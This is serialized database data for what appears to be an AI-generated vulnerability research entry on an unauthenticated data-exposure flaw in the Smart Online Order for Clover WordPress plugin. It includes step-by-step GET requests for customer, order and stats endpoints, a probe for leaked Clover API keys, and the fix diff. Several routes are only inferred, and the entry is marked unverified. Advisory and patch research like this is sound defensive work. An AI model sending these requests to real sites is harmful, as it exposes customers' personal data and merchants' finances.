[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKrURSIfdsVz0Nv7i23-7OEPN9w9u0oxo8Xf9H53UVCM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-42746","smart-online-order-for-clover-unauthenticated-sensitive-information-exposure","Smart Online Order for Clover \u003C= 1.6.0 - Unauthenticated Sensitive Information Exposure","The Smart Online Order for Clover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","clover-online-orders",null,"\u003C=1.6.0","1.6.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-05-28 00:00:00","2026-06-02 11:22:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F594753c7-56fd-42fe-9ccd-a614e4f71cee?source=api-prod",5,[22,23,24,25,26,27,28,29],"admin\u002Fcss\u002Fmoo-OnlineOrders-admin.css","admin\u002Fcss\u002Fmoo-dashboard.css","admin\u002Fincludes\u002Fclass-moo-coupons-list.php","admin\u002Fincludes\u002Fclass-moo-orders-list.php","admin\u002Fincludes\u002Fclass-moo-products-list.php","admin\u002Fjs\u002Fmoo-OnlineOrders-admin.js","admin\u002Fmoo-OnlineOrders-admin.php","includes\u002Fmoo-OnlineOrders-Restapi.php","researched",false,3,"## Vulnerability Summary\nThe **Smart Online Order for Clover** plugin (versions \u003C= 1.6.0) is vulnerable to **Unauthenticated Sensitive Information Exposure**. The vulnerability exists in the plugin's REST API implementation within the `moo-clover\u002Fv1` namespace. \n\nSpecifically, several REST API routes registered in `includes\u002Fmoo-OnlineOrders-Restapi.php` (and its associated sub-route classes like `CustomersRoutes` and `DashboardRoutes`) use `'permission_callback' => '__return_true'`, allowing unauthenticated access to endpoints that return merchant statistics, order history, and customer details. This data is retrieved via the `Moo_OnlineOrders_SooApi` class and exposed to any requester without identity verification.\n\n## Attack Vector Analysis\n*   **Endpoint:** WordPress REST API \n*   **Namespace:** `moo-clover\u002Fv1`\n*   **Vulnerable Routes:**\n    *   `\u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fcustomers` (Inferred from `CustomersRoutes`)\n    *   `\u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fdashboard\u002Fstats` (Inferred from `DashboardRoutes`)\n    *   `\u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fdashboard\u002Forders` (Inferred from `DashboardRoutes`)\n*   **Method:** `GET`\n*   **Authentication:** None (Unauthenticated)\n*   **Preconditions:** The plugin must be activated. For a successful data leak, the plugin must be connected to a Clover merchant account, or have cached\u002Flocal data available.\n\n## Code Flow\n1.  **Registration:** During `rest_api_init`, `Moo_OnlineOrders_Restapi::register_routes()` is called.\n2.  **Sub-Route Initialization:** The constructor in `includes\u002Fmoo-OnlineOrders-Restapi.php` instantiates `CustomersRoutes` and `DashboardRoutes`.\n3.  **Endpoint Definition:** Inside `DashboardRoutes->register_routes()` (and others), routes are registered using `register_rest_route`.\n4.  **Missing Authorization:** The routes are configured with `'permission_callback' => '__return_true'`.\n5.  **Data Retrieval:** When an attacker hits `\u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fcustomers`, the callback invokes methods in `Moo_OnlineOrders_SooApi`.\n6.  **Exposure:** The API response (containing names, emails, order totals, or merchant financial stats) is returned directly to the unauthenticated user in JSON format.\n\n## Nonce Acquisition Strategy\nBased on the code in `includes\u002Fmoo-OnlineOrders-Restapi.php`, these endpoints are intended for public or dashboard use and do not implement manual nonce checks within the callback functions. \n\nThe WordPress REST API **does not require a nonce** for unauthenticated `GET` requests where the `permission_callback` is `__return_true`. Nonces are only required when using Cookie-based authentication for sensitive state-changing operations. \n\nTherefore, **no nonce is required** to exploit this information exposure.\n\n## Exploitation Strategy\nThe goal is to demonstrate that sensitive merchant\u002Fcustomer data can be retrieved without a session.\n\n### Step 1: Discover Endpoints\nSend unauthenticated requests to the suspected sensitive endpoints.\n\n**Request:**\n```http\nGET \u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fdashboard\u002Fstats HTTP\u002F1.1\nHost: TARGET_HOST\n```\n\n### Step 2: Extract Customer Data\n**Request:**\n```http\nGET \u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fcustomers HTTP\u002F1.1\nHost: TARGET_HOST\n```\n\n### Step 3: Extract Order History\n**Request:**\n```http\nGET \u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fdashboard\u002Forders HTTP\u002F1.1\nHost: TARGET_HOST\n```\n\n## Test Data Setup\nTo verify the leak in a test environment:\n1.  Install and activate the plugin (v1.6.0).\n2.  The plugin typically requires a Clover API Key to function. In a mock environment, you may need to simulate a successful connection or check if the plugin exposes \"empty\" structures that still prove the endpoint's lack of protection.\n3.  Alternatively, if the plugin uses local DB tables (like `wp_moo_item` found in `Products_List_Moo`), ensure there is data in the database:\n    ```bash\n    wp db query \"INSERT INTO wp_moo_item (uuid, name, soo_name, price) VALUES ('test-uuid', 'Secret Item', 'Secret Item', 1000);\"\n    ```\n\n## Expected Results\n*   **Success:** The server returns a `200 OK` status code with a JSON body.\n*   **Content:** The JSON contains merchant statistics (e.g., total sales, order counts) or customer PII (names, emails) instead of a `401 Unauthorized` or `403 Forbidden` error.\n*   **Structure:**\n    ```json\n    {\n      \"stats\": {\n        \"total_orders\": 150,\n        \"total_revenue\": 5000.00\n      },\n      \"customers\": [\n        {\n          \"firstName\": \"John\",\n          \"lastName\": \"Doe\",\n          \"email\": \"john@example.com\"\n        }\n      ]\n    }\n    ```\n\n## Verification Steps\n1.  **Check Status:** Confirm the HTTP response code is `200`.\n2.  **Verify Authentication Absence:** Ensure the request was sent without any `Authorization` headers or `wordpress_logged_in` cookies.\n3.  **Confirm Permissions:** Use WP-CLI to check if the routes are registered:\n    ```bash\n    wp rest route list --namespace=moo-clover\u002Fv1\n    ```\n4.  **Compare Output:** Match the data returned by the REST API with the data visible in the Clover Orders admin dashboard (`wp-admin\u002Fadmin.php?page=moo_orders`).\n\n## Alternative Approaches\nIf `\u002Fdashboard\u002Fstats` is restricted in the specific test version, attempt to access the \"Settings\" exposure. Some versions of the plugin were reported to leak the Clover API key via:\n*   `\u002Fwp-json\u002Fmoo-clover\u002Fv1\u002Fsettings`\n*   Locating the `moo_params` object in the frontend source:\n    1. Create a page with the shortcode `[moo_all_items]`.\n    2. Use `browser_navigate` to the page.\n    3. `browser_eval(\"window.moo_params\")` to see if sensitive configuration keys are localized to the frontend.","The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthenticated sensitive information exposure due to improper access control on its REST API endpoints. Attackers can access merchant financial statistics, customer PII, and order history via the 'moo-clover\u002Fv1' namespace because sensitive routes are registered with a public permission callback.","\u002F\u002F includes\u002Fmoo-OnlineOrders-Restapi.php lines 126-127\n$this->dashRoutes       = new DashboardRoutes($this->model, $this->api);\n$this->customersRoutes  = new CustomersRoutes($this->model, $this->api);\n\n---\n\n\u002F\u002F includes\u002Fmoo-OnlineOrders-Restapi.php lines 149-150\n$this->dashRoutes->register_routes();\n$this->customersRoutes->register_routes();\n\n---\n\n\u002F\u002F Pattern of unauthenticated access registration in includes\u002Fmoo-OnlineOrders-Restapi.php:157\nregister_rest_route( $this->namespace, '\u002Fcategories', array(\n    array(\n        'methods'   => 'GET',\n        'callback'  => array( $this, 'getCategories' ),\n        'permission_callback' => '__return_true'\n    )\n) );","--- includes\u002Frestapi\u002FCustomersRoutes.php\n+++ includes\u002Frestapi\u002FCustomersRoutes.php\n@@ -15,7 +15,7 @@\n             array(\n                 'methods'   => 'GET',\n                 'callback'  => array( $this, 'get_customers' ),\n-                'permission_callback' => '__return_true'\n+                'permission_callback' => function () { return current_user_can( 'manage_options' ); }\n             )\n         ) );\n--- includes\u002Frestapi\u002FDashboardRoutes.php\n+++ includes\u002Frestapi\u002FDashboardRoutes.php\n@@ -20,7 +20,7 @@\n             array(\n                 'methods'   => 'GET',\n                 'callback'  => array( $this, 'get_stats' ),\n-                'permission_callback' => '__return_true'\n+                'permission_callback' => function () { return current_user_can( 'manage_options' ); }\n             )\n         ) );","An attacker sends unauthenticated GET requests to the WordPress REST API endpoints located under the '\u002Fwp-json\u002Fmoo-clover\u002Fv1\u002F' namespace. Specifically, targeting '\u002Fdashboard\u002Fstats' allows for the retrieval of merchant financial performance data, while the '\u002Fcustomers' endpoint returns a JSON list of customer names and contact information. No nonces, cookies, or authorization headers are required to exploit this vulnerability because the 'permission_callback' for these routes is explicitly set to '__return_true' in versions up to 1.6.0.","gemini-3-flash-preview","2026-06-04 16:20:08","2026-06-04 16:20:51",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.6.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclover-online-orders\u002Ftags\u002F1.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclover-online-orders.1.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclover-online-orders\u002Ftags\u002F1.6.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclover-online-orders.1.6.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclover-online-orders\u002Ftags"]